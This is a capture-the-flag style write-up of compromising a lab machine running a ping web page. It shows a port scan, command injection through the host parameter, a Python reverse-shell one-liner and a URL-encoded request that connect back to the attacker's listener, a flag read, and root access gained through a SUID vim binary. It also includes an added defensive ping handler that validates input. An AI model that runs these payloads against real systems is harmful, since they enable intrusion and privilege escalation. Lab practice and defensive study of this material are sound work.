PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:b9:6d:35:0b:c5:c4:5a:86:e0:26:10:95:48:77:82 (RSA)
| 256 a8:0f:a7:73:83:02:c1:97:8c:25:ba:fe:a5:11:5f:74 (ECDSA)
|_ 256 fc:e9:9f:fe:f9:e0:4d:2d:76:ee:ca:da:af:c3:39:9e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It is a ping host website.
Found some inspiration from this post https://www.hackerone.com/ethical-hacker/how-command-injections
where we can add `;` after the IP and inject whatever command we want.
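As an added defender-side example that is not part of this writeup or the target's own code: a ping handler written in Python (the language of the box's real web app is not shown here) that validates the `host` parameter as an IP literal or plain hostname and passes it to `ping` as an argv list instead of through a shell, so a `;` after the IP has nothing to land on. The function names and the `-c`/`-W` ping options are my choices.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname label: letters, digits and hyphens, no leading/trailing hyphen.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def validate_host(value: str) -> str:
    """Return value if it is an IP literal or a plain hostname, else raise ValueError.

    Everything the injection relied on (';', '|', '&', '$', '`', quotes,
    whitespace, newlines) falls outside both grammars and is rejected.
    """
    value = value.strip()
    if not value or len(value) > 253:
        raise ValueError("host is empty or too long")
    try:
        ipaddress.ip_address(value)  # IPv4 or IPv6 literal
        return value
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(value):
        return value
    raise ValueError(f"invalid host: {value!r}")


def ping_argv(host: str) -> list[str]:
    """Build the argv for one ping probe; the host is never parsed by a shell."""
    return ["ping", "-c", "1", "-W", "2", validate_host(host)]


def run_ping(host: str) -> str:
    """Run ping without shell=True; a rejected host raises before anything executes."""
    proc = subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=10)
    return proc.stdout


if __name__ == "__main__":
    # Constructed inputs: a legitimate address and the shape of the payload used above.
    for candidate in ("192.168.49.125", "192.168.49.125;python3 -c 'import os'"):
        try:
            print("accepted:", ping_argv(candidate))
        except ValueError as exc:
            print("rejected:", exc)
```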
Nice, we can do command injection here, so let's use a one-liner to get a reverse shell.
After trying many one-liners, only port 80 works; perhaps it's because that port is open.
And don't forget to change it to python3, because the system does not have python:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.125",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
End result by visiting
<http://192.168.125.86/?host=192.168.49.125;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.125%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27>
We will get our reverse shell:
┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.125] from (UNKNOWN) [192.168.125.86] 42924
www-data@shakabrah:/var/www/html$ cat /home/dylan/local.txt
d49f86c89136814455bf33b0f17f3848
find / -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/vim.basic
/usr/bin/newuidmap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
We have /usr/bin/vim.basic with the SUID bit set, which is very suspicious.
However, to use vim we need to upgrade our shell first:
export TERM=xterm
python3 -c "import pty;pty.spawn('/bin/bash')"
**Press CTRL+Z to background the shell, then run the following on the attacker machine:**
stty raw -echo ; fg
reset
/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'